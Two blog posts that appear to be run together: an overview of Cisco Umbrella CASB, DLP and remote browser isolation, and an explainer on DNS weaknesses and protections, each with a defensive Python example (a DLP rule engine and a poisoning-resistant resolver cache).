Cisco Umbrella CASB

In today’s digital landscape, the cloud has become an indispensable part of businesses of all sizes. However, with the increasing reliance on cloud services, ensuring the security of sensitive data and preventing unauthorized access has become a paramount concern. This is where Cisco Umbrella CASB (Cloud Access Security Broker) comes into play. In this blog post, we will explore the key features and benefits of Cisco Umbrella CASB and how it can help organizations fortify their cloud environment.

Cisco Umbrella CASB is a comprehensive cloud security solution that provides visibility, control, and protection across cloud applications and services. It acts as a gatekeeper, enabling organizations to enforce security policies, detect and prevent threats, and ensure compliance in the cloud.

Highlights: Cisco Umbrella CASB

A Platform Approach

We must opt for a platform approach to visibility and control, and more specifically a platform that works in third-party environments. For cloud security, this is where secure access service edge (SASE) can assist. Cisco's SASE offering is Cisco Umbrella, which includes the CASB and comes in various packages depending on your needs.

The Cisco Umbrella SASE solution offers a range of CASB security functions and tools, Data Loss Prevention (DLP), and Umbrella Remote Browser Isolation (RBI), which help you better understand and control your environment.

Automatic Discovery and Risk Profiling

Doing this manually means investigating and mapping traffic patterns, data movement, and usage by hand. Instead, we need automatic discovery and risk profiling. You need visibility into the applications, files, and data you know about, and also into the ones you do not. You will be amazed by the number of malicious files already sitting in sanctioned applications.

Related: For pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. Cisco Secure Firewall
  3. SASE Model
  4. Cisco CloudLock


Back to Basics: Cisco Umbrella CASB

The Role of SASE

The Cisco Umbrella SASE solution offers further security functionality, such as a cloud-delivered Layer 7 firewall, Secure Web Gateway (SWG), DNS-layer security, SD-WAN, and ThousandEyes integration for monitoring and observability. So we have the traditional security stack you are familiar with, plus enhancements that make it more cloud-friendly. These functions are part of a single SASE solution managed from one Cisco Umbrella dashboard with API integrations.

Cisco Umbrella SASE features:

  • Cloud Access Security Broker and Data Loss Prevention (inline)
  • DNS-Layer Security
  • Remote Browser Isolation
  • Secure Web Gateways (SWG)
  • Layer 7 Firewall

Key Features of Cisco Umbrella CASB

1. Cloud Application Discovery and Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It helps identify shadow IT and provides insights into data usage and user behavior.

2. Data Protection and Compliance: With advanced data loss prevention (DLP) capabilities, Cisco Umbrella CASB helps organizations prevent the leakage of sensitive data in the cloud. It enables granular policy enforcement, encryption, and monitoring to ensure compliance with industry regulations.

3. Threat Detection and Response: Cisco Umbrella CASB employs powerful threat intelligence and machine learning algorithms to detect and mitigate cloud-based threats. It provides real-time alerts, anomaly detection, and proactive incident response capabilities to defend against cyber-attacks.

Benefits of Cisco Umbrella CASB

1. Enhanced Cloud Security: By integrating seamlessly with cloud platforms and applications, Cisco Umbrella CASB offers centralized security management and protects against data breaches, malware, and unauthorized access attempts.

2. Improved Visibility and Control: With comprehensive visibility into cloud activity, organizations can gain insights into user behavior, identify risky applications, and enforce policies to control their cloud environment.

3. Streamlined Compliance: Cisco Umbrella CASB helps organizations meet the stringent compliance requirements of various industries by offering robust data protection, encryption, and auditing capabilities.


Use Case: Cisco Umbrella CASB

The Cisco Umbrella CASB fulfills a variety of CASB security use cases. The use case for the CASB solution depends on where you are in your SASE and cloud security voyage. For example, if you are interested in blocking Malware and content, then Umbrella DNS filtering would be fine.

Umbrella Security Features

However, you may be looking for additional security requirements. For example, you will need Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Umbrella Remote Browser Isolation (RBI). In that case, we need to move toward Umbrella SIG, which includes Layer 7 Firewalls. Cisco Umbrella offers several packages ranging from DNS Security Essentials to SIG Advantage. More information can be found here: Cisco Umbrella Packages.

Along with these security features, Cisco Umbrella also provides continuous file monitoring: it scans data at rest in sanctioned applications for files that could be malicious. Together, these tools improve your security posture and protect the organization against cloud-specific risks.

This post will examine how you start discovering and controlling applications with Cisco Umbrella. The Cisco Umbrella CASB components take you from the initial Discovery to understanding the Risk to maintaining activity by controlling access to specific applications for certain users and actions.

Cisco Umbrella's Data Loss Prevention (DLP), Cloud Access Security Broker (CASB), and Remote Browser Isolation engines carry out these security activities.


Diagram: Cisco Umbrella CASB.

Cloud security threats

Today’s shared challenge is that organizations need to know what applications they have in their environment. They also need to figure out what to do with specific types of data or how to find users and assign policies to them. These requirements must be met on someone else’s infrastructure, the cloud.

There are significant risks to working in cloud environments that differ from those on-premises. Consider storage: an unprotected storage environment poses a much greater security risk in the public cloud than in a private data center.

Within an on-premises private data center, firewall controls generally restrict direct access to storage, so an unprotected file is exposed only to users who already have access to data center systems. In the public cloud, on the other hand, an improperly managed storage bucket may be open to the entire Internet after a few clicks by a single person, or after an automated playbook runs without role-based access control (RBAC).

Umbrella Remote Browser Isolation

What is Remote Browser Isolation? Browsing the Internet is a dangerous activity. Unfortunately, we have an abundance of threats: malicious JavaScript, malvertising, exploit kits, and drive-by downloads. All of these target users as they interact with web content through their browsers.

Typically, when a user's browser is compromised, the attacker gains access to the machine the browser runs on. However, the bad actors' target assets are rarely on the first machine they compromise, so they commonly move laterally through the network.

Lateral Movements

Unfortunately, the tools used to move laterally are often legitimate sysadmin tools, so lateral movement can be hard to detect. As a security best practice, it is much better to remove the possibility of lateral movement altogether.

With Umbrella Remote Browser Isolation (RBI), the remote browser runs in an isolated container in the cloud, reducing the attack surface to a minimum and removing the potential to move laterally. The most sensible thing to do, therefore, is to isolate the browsing function. With browser isolation, malware is kept off the end user's system; the risk shifts to the server-side session, which can be reset to a known good state on every new browsing session, tab opened, or URL accessed.

Umbrella Remote Browser Isolation protects users from Malware and threats by redirecting browsing to a cloud-based host, which for some is based on a containerized technology. Isolation is achieved by serving web content to users via a remotely spun-up surrogate browser in the cloud.


Diagram: Umbrella Remote Browser Isolation.

Umbrella Remote Browser Isolation allows users to access whatever content they want, such as a web page or a document. The user's request is sent through an isolation engine, which strips away anything that could be malicious, such as macros or malware, and then returns a fully rendered version of the content.

For example, this could be a web app or a website. With remote browser isolation, you scrub away anything that could be malicious and give the user a clean, rendered version.

To the user it is fully transparent: they have no idea they are looking at a rendered version, yet they receive a clean, safe piece of content that will not introduce malware into the environment, and without a performance hit.

Cisco Umbrella CASB

You can use Cisco Umbrella CASB to discover your actual usage of cloud services through multiple means, such as network monitoring, integration with existing network gateways and monitoring tools, or even monitoring Domain Name System (DNS) queries. This is a form of discovery service that the CASB solution provides.

This is the first step in CASB security: understanding both sanctioned and shadow IT. Once the different services are discovered, a CASB solution can monitor activity on approved services through two standard deployment options.

These are an API connection and inline (man-in-the-middle) interception. Some vendors offer a multimode approach. Both deployment modes have their advantages and disadvantages.

Diagram: CASB solution.

The CASB alone is far from a silver bullet and works in combination with other security functions. The power of Cisco Umbrella CASB depends on its Data Loss Prevention (DLP) capabilities, which can be either part of the CASB solution or an external service, depending on the CASB security vendor’s capabilities. In the case of the Cisco Umbrella, it has an inline DLP engine.

Data Loss Prevention

After Discovery is performed, CASB security can be used as a preventative control to block access to SaaS products. This functionality, however, is quickly being replaced through integration with DLP. DLP systems inspect network traffic leaving your systems, looking for sensitive data. Traffic carrying unauthorized data is terminated to protect it from loss and leakage.

Through integration with a DLP service, you can continue to allow access to a SaaS product, but you can control what is being done within that SaaS product. So, for example, if somebody uses Twitter, you can restrict specific keywords or statements from being sent to the platform.

For example, if you use an application like Salesforce in the cloud and have a policy that forbids copying or downloading customer databases from Salesforce, the CASB solution can enforce that policy as well as monitor whether someone attempts to download data or otherwise violate it.


Diagram: Data Loss Prevention.

Cisco Umbrella CASB: SASE Capabilities

Cisco Umbrella’s CASB, DLP, and Umbrella remote browser isolation (RBI) offering is a core part of Cisco’s overall SASE strategy. The value of CASB security is from its capability to give insight into cloud application use across cloud platforms and identify unsanctioned use.

CASBs use auto-discovery to detect cloud applications and identify high-risk applications and users. In addition, they include DLP functionality and the capability to detect and alert on abnormal user activity, to help stop internal and external threats. This enables Cisco Umbrella to expose shadow IT by detecting and reporting on the cloud applications used across your environment.

Cisco Umbrella Visibility: what App Discovery provides

  • Extended visibility into cloud apps in use and traffic volume
  • App details and risk information
  • Capability to block/allow specific apps

Now we have a central place for all applications. Cisco Umbrella CASB looks at all your cloud applications and puts them on a single pane of glass where you can manage them and see what is happening, although that functionality has to exist already. So, instead of going to a hundred different applications and cloud providers, you go to one system, your CASB solution, which handles everything.

Pillar 1: Visibility

The CASB security should detect all cloud services, assign each a risk ranking, and identify all users and third-party apps able to log in. More often than not, there are a number of power users, such as finance, with access to large data sets. Files are shared and exposed through the content of the files used, and apps are installed.

This generally comes down to a small group of users controlling most applications. It is these few users who introduce a considerable amount of security risk. In addition, they often collaborate with several external parties through cloud-based sharing, not to mention sharing with non-corporate email addresses.

Diagram: CASB Security.

  • A key point: Understanding risk.

The first thing you want to do is understand the risk. Here, you can identify risky applications by gaining visibility into any shadow IT: apps that admins have no control over or visibility into, yet that are being used in the environment they need to protect.

You can also dig into which identities use these applications and why. How do you gain this visibility? You may be wondering where all this data comes from; a few sources can be used for discovery, which we discuss below.

Applications in your environment can be displayed in different categories, with risk broken down by several criteria. For example, there is business risk, usage risk, and vendor compliance, and each risk category is made up of different factors. Cisco Umbrella CASB integrates with Cisco Talos, which provides reputation information by looking at the host domain and URL associated with the app and tells you whether the app has a good reputation.

Pillar 2: Discovery

To gain visibility, we have to perform Discovery. The discovery process involves pulling log data in from other security products and then analyzing the information. All of the capabilities to discover apps work out of the box; you only need to send user traffic to the Umbrella system. The first source is DNS; applications can also be discovered through the Secure Web Gateway (SWG) proxy and the cloud-delivered firewall.

These SASE engines give you a unique view of sanctioned and unsanctioned applications. If you send traffic through one of these Cisco Umbrella engines, it collects this data automatically. Cisco Umbrella also has a Layer 7 application firewall that can report application protocols, giving you the top-used protocols per application.

Diagram: Cisco Umbrella CASB and the Discovery process.

Umbrella has several engines that help with Discovery, such as the native proxy, the firewall, and DNS logs. The user can be determined whenever an engine picks up the traffic, whether at the DNS or firewall level. This gives you a holistic view of each application, such as its associated risk and the identities using it on a per-app basis. We can then take a broader look at risk to understand cloud apps and traffic going to, for example, malware hosts and command-and-control (C&C) servers, and whether any Tor endpoints are running on your network.

Pillar 3: Data Security and Control

When dealing with any systematic issue, prevention is critical, with a focus on data protection. A good start would be to define which applications are risky. From there, you can build a workflow and data sets that you need to protect from, for example, data leakage. Once Discovery is performed along with risk assessment, you can prevent unwanted applications in your environment, which is the first step in enforcement.

The first component is the CASB security, then DLP to enforce controls. We are creating DLP policies to prevent data leakage. The CASB should be able to identify and control sensitive information. So here, we have DLP features and the capability to respond to classification labels on content.

There is a component called granular control, in which you can allow access to special applications but control different actions for specific applications and users. For example, you can enable access to the app but block uploads. You can then tie this to an identity so only your finance team can upload it. You can allow, secure, and also isolate. The CASB DLP can operate natively and in conjunction with enterprise DLP products via Internet Content Adaptation Protocol (ICAP) or REST API integration. 

A standard DLP engine for the on-premise and cloud locations will eliminate policy duplication. This Cisco Umbrella solution opts for an inline DLP engine without the need to service chain to an additional appliance.


Inline Data Loss Prevention

The Data Loss Prevention policy monitors content classified as personally identifiable or sensitive information. When necessary, content is blocked from an upload or a post. With Cisco DLP, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored. For example, an office may want to monitor its network for file uploads that include credit card numbers, because such uploads breach company privacy and security policies. A rule that scans uploads to the relevant domains can block these files.

Cisco Umbrella: 80 pre-built data identifiers

There are two primary functions of DLP. The first is identifying and classifying sensitive data; the second is the action to take. Cisco Umbrella has robust DLP classification with over 80 pre-built data identifiers, combined with detailed reporting on every DLP event. So, when working with DLP, you first select a data classification. This is where you start your DLP, with different identifiers for the data. If you are concerned with financial data sets and want to look for credit card numbers, you can choose from a list of pre-built identifiers. Then, you can add your own customizations.

Diagram: Data Loss Prevention.

The Cisco Umbrella DLP engine also supports regular expressions for pattern matching, which lets you match any pattern you define. So we have custom and pre-built identifiers, which are then applied to a DLP policy. As noted, there is only one data loss prevention policy. Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored.

Deployment: CASB Solution

CASBs operate using two approaches. Inline CASB solutions reside in the connection path between the user and the service. They may do this through a hardware appliance or an endpoint agent that routes requests through the CASB. This approach requires configuration of the network and endpoint devices. However, it has the advantage of seeing requests before they are sent to the cloud service, allowing the CASB to block submissions that violate policy.

API-based CASB solutions do not interact directly with the user but rather with the cloud provider through the provider’s API. This approach provides direct access to the cloud service and does not require any user device configuration.

However, it also does not allow the CASB to block requests that violate policy. As a result, API-based CASBs are limited to monitoring user activity and reporting on or correcting policy violations after the fact.


Starting a SASE Project

DLP starting points

As a starting point, when considering DLP, there are a few best practices to follow. First, you must "train" the DLP to understand what is sensitive data and what is not. Run the DLP in monitoring-only mode at first rather than blocking aggressively; you want to understand what is happening before you start to block.

Sometimes you want to understand more about the data, its identifiers, and where it moves. Second, a DLP engine generally cannot inspect encrypted traffic; if it can, check the performance hit. Third, some cloud SDKs and APIs may encrypt portions of data and traffic, which will interfere with the success of a DLP implementation.

With Cisco Umbrella, as a best practice, you can start with the pre-built identifiers and create custom dictionaries to monitor your organization's specific keywords and phrases. Then, you can create specific rules based on the users, groups, devices, and locations whose data you want to watch. Finally, you can choose which destinations and apps you would like to monitor; many organizations choose only to monitor when creating DLP rules and then enable blocking over time.
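The DLP model described in the last few sections (pre-built identifiers plus regular expressions, custom dictionaries, rules scoped to identities and destinations, and a monitor-first rollout that turns on blocking later) can be reduced to a small rule engine. The following is an added example written for this post, not Cisco Umbrella code and not its policy format. The credit-card identifier pairs a regular expression with a Luhn check to cut false positives, the dictionary identifier stands in for a custom keyword list, and the rule set starts broad in monitor mode and blocks only a narrow, well-understood case. The users, groups, destination domains and codenames are constructed sample values.

```python
import re
from dataclasses import dataclass
from typing import Callable, List, Set

# Identities, destinations and dictionary terms below are constructed
# sample values for this example, not Cisco Umbrella configuration.


def luhn_valid(digits: str) -> bool:
    """Luhn checksum: a card-number identifier uses it so that random digit
    strings such as order or ticket numbers are not reported as card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


# "Pre-built" style identifier: 13-19 digits with optional spaces or dashes.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def find_card_numbers(text: str) -> List[str]:
    """Return candidate card numbers that also pass the Luhn check."""
    return [m.group(0) for m in CARD_RE.finditer(text)
            if luhn_valid(re.sub(r"[ -]", "", m.group(0)))]


def dictionary_identifier(terms: List[str]) -> Callable[[str], List[str]]:
    """Custom dictionary: case-insensitive match on the organisation's own keywords."""
    pattern = re.compile("|".join(re.escape(t) for t in terms), re.IGNORECASE)
    return lambda text: [m.group(0) for m in pattern.finditer(text)]


@dataclass
class Rule:
    name: str
    identities: Set[str]                           # users or groups; "*" means everyone
    destinations: Set[str]                         # destination domains; "*" means any
    identifiers: List[Callable[[str], List[str]]]  # data classifications to look for
    action: str                                    # "monitor" or "block"


@dataclass
class Verdict:
    rule: str
    action: str
    matches: List[str]


def evaluate(rules: List[Rule], user: str, group: str,
             destination: str, content: str) -> List[Verdict]:
    """Run every applicable rule over the content of one upload or post."""
    verdicts = []
    for rule in rules:
        if "*" not in rule.identities and not ({user, group} & rule.identities):
            continue
        if "*" not in rule.destinations and destination not in rule.destinations:
            continue
        matches = [m for ident in rule.identifiers for m in ident(content)]
        if matches:
            verdicts.append(Verdict(rule.name, rule.action, matches))
    return verdicts


def inline_decision(verdicts: List[Verdict]) -> str:
    """Inline mode sees the request before it leaves: block if any rule says
    block, otherwise allow and keep the monitor-only hits as report entries."""
    return "block" if any(v.action == "block" for v in verdicts) else "allow"


def build_default_rules() -> List[Rule]:
    """Monitor-only for the broad identifier; block only the narrow case of the
    finance group posting project codenames to a paste site."""
    return [
        Rule("card-numbers-monitor", {"*"}, {"*"}, [find_card_numbers], "monitor"),
        Rule("codenames-finance-block", {"finance"}, {"paste.example"},
             [dictionary_identifier(["BLUEHERON", "Project Kestrel"])], "block"),
    ]


if __name__ == "__main__":
    rules = build_default_rules()
    hits = evaluate(rules, "alice", "finance", "paste.example",
                    "Invoice for card 4111 1111 1111 1111, ref BLUEHERON")
    for v in hits:
        print(f"{v.rule}: {v.action} {v.matches}")
    print("decision:", inline_decision(hits))
```

`inline_decision` is the inline deployment mode from the section above: the verdict is produced before the content reaches the cloud service. An API-based deployment would run the same `evaluate` over content already in the service and could only record the verdicts and remediate afterwards. Promoting a rule from `monitor` to `block` is a one-word change once the monitor-mode reports show it fires only on real policy violations.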

CASB Solution

  • Discover all applications
  • Calculate risk
  • Apply controls to identities
  • Detect and mitigate threats

Data Loss Prevention

  • Train the DLP engine
  • Do not be aggressive
  • Encrypted traffic support
  • Pre-built identifiers

Cisco Umbrella CASB starting points

Consider the following recommendations when starting a project that includes CASB functionality. First, discover sanctioned and unsanctioned cloud services, then assess the cloud risk based on cloud service categories. This includes all cloud services and cloud plug-ins. Once this information has been gained, it can be measured along with risk and compared to the organization's risk tolerance.

Next, identify and protect sensitive information. Once you find all sensitive information in the cloud, you can classify it and then apply controls to control its movement, such as DLP. For example, additional protections can be used if sensitive data is moved from the cloud services to a local unmanaged laptop.


  • A final note: Detect and mitigate threats.

You can assess user behavior and any deviations that may signal out-of-normal activity. The CASB is one of many solutions that should be used here; more mature products with advanced detection, such as Splunk User Behavior Analytics (UBA), also apply. For example, once a significant deviation from the baseline is noticed, trust decreases. You could then implement step-down privileges or more extreme measures, changing the level of access. In addition, it is helpful to track the movement of all data and to detect and eliminate malware, and then to have an implementation strategy for remediation.

Summary: Cisco Umbrella CASB

In today’s digital landscape, businesses are rapidly adopting cloud technologies to drive innovation and enhance productivity. However, this shift towards the cloud also introduces new security challenges. Enter Cisco Umbrella CASB, a comprehensive cloud access security broker solution that empowers organizations to safely navigate their cloud journey while ensuring data protection and compliance.

Section 2: Understanding Cisco Umbrella CASB

Cisco Umbrella CASB is a robust platform that provides visibility, control, and protection across all cloud applications and services utilized by an organization. It offers a centralized console to manage cloud access, enforce security policies, and detect potential threats. With its advanced capabilities, Cisco Umbrella CASB enables businesses to embrace the cloud securely.

Section 3: Key Features and Benefits

a) Cloud Application Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It provides valuable insights into user activities, data transfers, and potential risks, allowing administrators to make informed decisions.

b) Policy Enforcement: With granular policy controls, Cisco Umbrella CASB enables organizations to define and enforce security policies tailored to their specific needs. It ensures that data is accessed, shared, and stored within the cloud according to predefined guidelines, reducing the risk of data breaches or unauthorized access.

c) Threat Detection and Response: By leveraging advanced threat intelligence and machine learning, Cisco Umbrella CASB proactively identifies and mitigates potential threats within cloud environments. It alerts administrators about anomalous activities, suspicious behavior, or policy violations, enabling swift incident response.

Section 4: Seamless Integration and Scalability

Cisco Umbrella CASB seamlessly integrates with existing security infrastructure, including firewalls, proxies, and endpoint security solutions. This integration allows businesses to leverage their existing investments while extending comprehensive cloud security capabilities. Additionally, the solution scales effortlessly as organizations expand their cloud footprint, ensuring continuous protection.

Section 5: Real-World Use Cases

a) Data Loss Prevention: Cisco Umbrella CASB helps prevent sensitive data leakage by monitoring and controlling data transfers within cloud applications. It enables organizations to set up policies that restrict the sharing of confidential information or personally identifiable data, reducing the risk of data loss incidents.

b) Compliance and Governance: With its robust auditing and reporting capabilities, Cisco Umbrella CASB assists organizations in meeting regulatory compliance requirements. It provides detailed logs and insights into user activities, ensuring transparency and accountability in cloud usage.

Section 6: Conclusion

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive feature set, seamless integration, and scalability make it an invaluable asset for organizations aiming to secure their cloud journey. By harnessing the power of Cisco Umbrella CASB, businesses can unlock the true potential of the cloud while safeguarding their critical assets and maintaining compliance.

DNS Security Solutions

In today's digital landscape, where cybersecurity threats loom large, it is crucial to fortify your online presence. DNS (Domain Name System) security is an often overlooked aspect of online security. In this blog post, we will delve into the world of DNS security solutions, exploring their significance and the measures you can take to protect your digital assets.

The Domain Name System is the backbone of the internet and is responsible for translating user-friendly domain names into IP addresses that computers can understand. However, this critical function also makes DNS vulnerable to cyberattacks. This section will discuss DNS attacks' potential risks and consequences, highlighting the need for robust security measures.

Highlights: DNS Security Solutions

No Security By Default

This post will outline the domain name system: the DNS structure, the vulnerabilities and abuses of DNS security designs, and guidance on implementing DNS protection with examples of DNS security solutions with Cisco, like Cisco Umbrella DNS. Unfortunately, like many Internet protocols, the DNS system was designed without security in mind and contained several security limitations regarding privacy, integrity, and authenticity.

Constant Security Threats

These security constraints, combined with bad actors' technological advances, leave DNS servers vulnerable to a broad spectrum of DNS attack vectors, including DNS reflection attacks, DNS tunneling, DoS (Denial of Service), and the theft of private personal information through data exfiltration over the DNS protocol. As you can presume, this makes the DNS layer an attractive avenue for bad actors when penetrating networks and exfiltrating data.

Related: For pre-information, you will find the following posts helpful:

  1. OpenShift SDN
  2. GTM Load Balancer
  3. Open Networking
  4. SASE Model



DNS Security Cisco

Key DNS Security Solutions discussion points:

  • Numerous DNS attack vectors.

  • Decentralized but not secure.

  • DNS queries are not encrypted.

  • Privacy, integrity and authenticity do not exist.

  • Issues with UDP as transport.

  • Cisco DNS Security with Cisco Umbrella DNS.

  • DNS solution and PKI.

Back to Basics: DNS Security Solutions

♦ DNS Caching

The whole resolution process may seem involved. However, it is usually relatively fast. One of the features that speeds it up considerably is caching. A nameserver processing a recursive query may have to send out several queries to find an answer, but it discovers a lot of information about the domain namespace as it does so.

Each time it refers to another list of nameservers, it learns that those nameservers are authoritative for some zone, and it knows the addresses of those servers. At the end of the resolution process, when it finally finds the data the original querier sought, it can also store it for future reference.
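The caching behaviour just described, and the cache-poisoning risk raised under "Types of DNS Attacks" below, can be shown with a small model of a resolver cache. This is an added example written for this post, not code from any nameserver: each answer is stored under its (name, type) key with an expiry derived from the record's TTL, a stale entry is discarded rather than served, and `cache_response` accepts a record only if it lies within the bailiwick of the zone the answering server is authoritative for, which is the standard defence against a server slipping an unrelated name into its reply. The names, addresses (from the documentation ranges) and TTLs are constructed sample values.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Record:
    name: str   # owner name, e.g. "www.example.com"
    rtype: str  # "A", "NS", ...
    data: str   # rdata as text, e.g. "192.0.2.10" (constructed, TEST-NET-1)
    ttl: int    # seconds the answer may be reused


class ResolverCache:
    """TTL-bounded cache of what a recursive nameserver learned while resolving."""

    def __init__(self) -> None:
        # (name, type) -> (absolute expiry time, list of rdata strings)
        self._entries: Dict[Tuple[str, str], Tuple[float, List[str]]] = {}

    @staticmethod
    def _key(name: str, rtype: str) -> Tuple[str, str]:
        # DNS names are case-insensitive; a trailing dot means the same name.
        return (name.lower().rstrip("."), rtype.upper())

    def put(self, records: List[Record], now: float) -> None:
        """Store records grouped per (name, type); the set's TTL is the smallest TTL seen."""
        grouped: Dict[Tuple[str, str], Tuple[int, List[str]]] = {}
        for r in records:
            k = self._key(r.name, r.rtype)
            ttl, rdata = grouped.get(k, (r.ttl, []))
            grouped[k] = (min(ttl, r.ttl), rdata + [r.data])
        for k, (ttl, rdata) in grouped.items():
            self._entries[k] = (now + ttl, rdata)

    def get(self, name: str, rtype: str, now: float) -> Optional[List[str]]:
        """Return cached rdata, or None if absent or expired (expired data is never served)."""
        k = self._key(name, rtype)
        entry = self._entries.get(k)
        if entry is None:
            return None
        expires, rdata = entry
        if now >= expires:
            del self._entries[k]  # stale: must be re-resolved
            return None
        return rdata


def in_bailiwick(record_name: str, zone: str) -> bool:
    """True if record_name is the zone apex or lies beneath it."""
    r = record_name.lower().rstrip(".")
    z = zone.lower().rstrip(".")
    return r == z or r.endswith("." + z)


def cache_response(cache: ResolverCache, zone: str,
                   records: List[Record], now: float) -> List[str]:
    """Cache only records a server authoritative for `zone` is entitled to assert.
    An out-of-bailiwick record (for some other domain) is rejected; accepting it
    is the classic way a cache gets poisoned."""
    accepted = [r for r in records if in_bailiwick(r.name, zone)]
    cache.put(accepted, now)
    return [r.name for r in accepted]


if __name__ == "__main__":
    cache = ResolverCache()
    t0 = 1000.0  # simulated clock, seconds
    # Simulated reply from a server authoritative for example.com (constructed).
    reply = [
        Record("www.example.com", "A", "192.0.2.10", 300),
        Record("www.example.com", "A", "192.0.2.11", 300),
        Record("ns1.example.com", "NS", "ns1.example.com", 3600),
        Record("victim.example.org", "A", "198.51.100.5", 86400),  # not this server's to assert
    ]
    print("accepted:", cache_response(cache, "example.com", reply, t0))
    print("fresh:", cache.get("www.example.com", "A", t0 + 299))
    print("expired:", cache.get("www.example.com", "A", t0 + 300))
    print("poison attempt:", cache.get("victim.example.org", "A", t0))
```

Passing `now` explicitly instead of reading the system clock keeps the expiry logic testable and makes the TTL boundary visible: an answer with TTL 300 served at second 299 is still valid, and at second 300 it is gone.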

♦ Types of DNS Attacks

DNS attacks come in various forms, each with modus operandi and potential damage. From DDoS attacks that flood servers to cache poisoning that redirects users to malicious websites, understanding these attack vectors is crucial for implementing adequate security strategies. This section will shed light on some common types of DNS attacks.

♦ DNS Security Solutions

Thankfully, several DNS security solutions are available to safeguard your online presence. This section will explore some of the most effective and widely used security measures. From implementing DNSSEC (DNS Security Extensions) to deploying firewalls and intrusion detection systems, we will discuss how these solutions can help mitigate DNS-related threats.

♦ Best Practices for DNS Security

While deploying DNS security solutions is essential, following best practices to enhance your security posture is equally important. This section will outline some key best practices for DNS security, including regular patching and updates, monitoring DNS traffic, and employing multi-factor authentication. By adopting these practices, you can bolster your defenses against potential threats.

DNS Layer Security: Decentralized but not secure

The DNS protocol was developed to be decentralized and hierarchical, though not secure. Almost since its inception, there have been exploits. We must protect this critical network service. Several technologies have been implemented for DNS protection. These security technologies can be implemented with secure access service edge (SASE) products such as DNS security Cisco with the Cisco Umbrella DNS product. Cisco Umbrella DNS stops threats such as Malware before the initial connection.

DNS Protection: Are DNS inquiries encrypted?

DNS queries are not encrypted. Even if users use a DNS resolver like 1.1.1.1 that does not track their activity, DNS queries travel over the Internet in plaintext. Anyone who intercepts the query can see which websites the user is visiting. This absence of privacy has a significant impact on security: if DNS queries are not private, it becomes easier for governments to censor the Internet and for bad actors to spy on users' online behavior without their knowledge.

DNS Protection with Privacy, Integrity, and Authenticity

So, with DNS as designed, the properties we care most about in security are missing. In security we want privacy, integrity, and authenticity. With DNS left to its defaults there is no privacy: every query is visible in plaintext. For integrity, we want to know whether anyone altered the message between the query and the response. Finally, for authenticity, we have no way of knowing whether the server that responded is the one we meant to talk to, rather than a man-in-the-middle intercepting the queries and forging responses that lead users to malicious websites.

These concerns have led to several DNS protection technologies: the DNS firewall, DNS used as a security tool through reputation and inspection, securing the channel with DNS over TLS (DoT) and DNS over HTTPS (DoH), and securing the protocol itself with DNSSEC. Implemented correctly, together they restore the privacy, integrity, and authenticity that the default DNS protocol lacks. They address different properties, though: DoT and DoH protect the channel between the client and its resolver, DNSSEC authenticates the data regardless of channel, and neither replaces the other.

Diagram: DNS Security Solutions.

DNS Protection: Lack of DNS Security Solutions

Early days of DNS

In the early 1980s, the network was much smaller, with a few well-known and mutually trusting participants. As the network scaled, DNS remained an insecure and unauthenticated protocol, even though the network grew to include many unknown and untrusted participants.

We have been living with this protocol since the early 1980s. At the time, a few hundred hosts, mostly in the USA, communicated with each other using protocols such as FTP and SMTP. To reach a host you still needed its IP address, which you looked up in a hosts file. To be added to that file, you literally had to call the Network Information Center at SRI and ask; the entry was then added manually for you.

Diagram: DNS Protection.

Before the network could scale further, something had to replace the hosts file. This is when the Domain Name System was designed: instead of a single file that must be manually edited for every new host, we have delegation through a hierarchy.

With the Domain Name System, we have the concept of hierarchy. At the very top is the root, which knows the addresses of the servers for the top-level domains (TLDs) such as .com and .org; there are now well over a thousand TLDs. Each TLD is responsible only for the domains delegated beneath it, not for domains in any other TLD, and each of those domains is in turn responsible for its own names.

DNS protection: DNS creates blind spots

Organizations place a great deal of trust in DNS. Much the same excessive trust is placed in private IP address ranges: whether an address is public or private is just a matter of which binary values it contains, and says nothing about how trustworthy the host behind it is.

DNS traffic is typically permitted to pass freely through network firewalls and other security infrastructure. Bad actors abuse exactly this: DNS traffic can be manipulated through techniques such as DNS tunneling and DNS poisoning, all of which create blind spots in your security posture.

The issue with UDP

Let us start with the basics. A client that wants to connect to a host such as ‘www.network-insight.com’ asks DNS which IP address corresponds to that name. Most DNS messages are sent over UDP port 53 (TCP is used mainly for large responses and zone transfers), and this is where the problems start.

The first issue is that UDP is connectionless: there is no handshake, so the source IP address on a datagram is blindly trusted, much as a private IP address is trusted over a public one. Each request and response described here is a single UDP datagram carrying a source and destination address and nothing that proves who actually sent it.

Any host can forge the source address on a UDP message to make it look as if it came from the expected sender. A bad actor on a network that does not filter outbound packets can therefore construct a UDP message that claims to come from the authoritative server and send it to the recursive resolver.

Diagram: Attacking DNS.

DNS Security Cisco with DNS Security Solutions:

Neglected attack surface

Today’s bad actors use DNS’s often neglected attack surface to steal data, spread malware, exfiltrate information, run command and control, conduct network surveillance, and support social engineering.

DNS is a bidirectional, Internet-facing protocol that carries a tremendous amount of data, which makes it a powerful tool for an adversary to carry out attacks and cause damage. Combined with the fact that many security teams fail to secure their DNS traffic, the ubiquity of DNS makes it a potent yet often overlooked tool for bad actors.

Organizations may have solutions that inspect and secure the network with a stateful firewall, web traffic with secure web gateways (SWG), and even some of the newer zero trust technologies, but these solutions were not designed to perform deep inspection of DNS traffic. That leaves organizations exposed to the many threats that abuse DNS; techniques such as DNS tunneling go unnoticed.

In most cases DNS packets enter the network through ports that are not blocked, without first being inspected by security systems, and DNS activity on the network is rarely monitored. This makes the DNS layer the perfect blind spot for bad actors to manipulate.

Many of today’s sophisticated attacks depend on DNS activity. Malware is on the rise; ransomware binaries, once executed, encrypt quickly, and you cannot rely on employees never clicking on a phishing email. Trust is scarce and complexity is high.

